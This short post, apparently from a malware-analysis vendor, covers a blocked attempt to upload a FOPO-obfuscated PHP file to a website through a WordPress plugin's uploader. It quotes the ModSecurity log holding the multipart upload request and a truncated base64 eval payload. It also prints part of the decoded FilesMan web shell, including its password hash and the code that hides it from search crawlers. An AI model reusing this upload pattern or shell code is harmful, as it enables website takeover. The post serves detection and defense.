Free Online PHP Obfuscator is designed to help PHP developers protect their intellectual property. Any time you give your PHP source code to someone else your intellectual property can be used and altered without your permission.
It’s not one-way encryption but it will keep curious eyes away from your code.
These tryed again upload to server’s, here little sample modsecurity audit log:
--e5439532-C-- --13530703071348311 Content-Disposition: form-data; name="uploader_url" http://www.malware.expert/wp-content/plugins/wp-symposium/server/php/ --13530703071348311 Content-Disposition: form-data; name="uploader_uid" 1 --13530703071348311 Content-Disposition: form-data; name="uploader_dir" ./azNaop --13530703071348311 Content-Disposition: form-data; name="files[]"; filename="JMnDcBBW.php" Content-Type: application/octet-stream <?php /* Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ This code was created on Wednesday, May 11th, 2016 at 6:10 UTC from IP 203.66.57.176 (tw) Checksum: b56f18145b5a1f538c40418a696b900bde0a4b95 */ $ud4d324d="\142\x61\x73\x65\66\64\137\x64\x65\x63\x6f\144\145";@eval($ud4d324d( "Ly9OTnJOK1UvOEtBaUFhbnIyRnR3S0lvV3N1eHRsRnlkeFhoTWtPRm1pQ2V6b1gvN1dOZDBOd2E5Ql lnWTFqNEt4bXZHRFlkdC90Y2Fjc2NMek1vV3ZOLy83dWlDWU84bktpSUErOVhPbDZpODZTSWwyMjBLU zVFUXZRcjVRZ3NCamtodmw0SUpYRmx0VUNWcG8xb0VZVkcwZHlLUUs4TnF3Y2Y0Ui9JRTlCTTdOVENB WXVxR3NBOEpkQWtLY1VhelVOM3cwaU9YcDhHYzJMUzd0OHZSZFZvYTNNMTFCaDJJaE9wb2ZLd3A2dUZ Continues ...
You can decode PHP Obfuscator file here:
http://decode.tools
Also, but not tested:
http://lombokcyber.com/en/detools/decode-fopo
https://github.com/Helioscx/FOPO-Decoder
Again this PHP Obfuscator inside is Filesman backdoor:
?><?php $auth_pass = "866fd58d77526c1bda8771b5b21d5b11"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Bing"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } }
Again malware tryed uploaded to customer website.
References: http://www.fopo.com.ar/
Malware PHP Signatures
Use can use for FREE Malware Expert – Signatures detect malware from PHP files.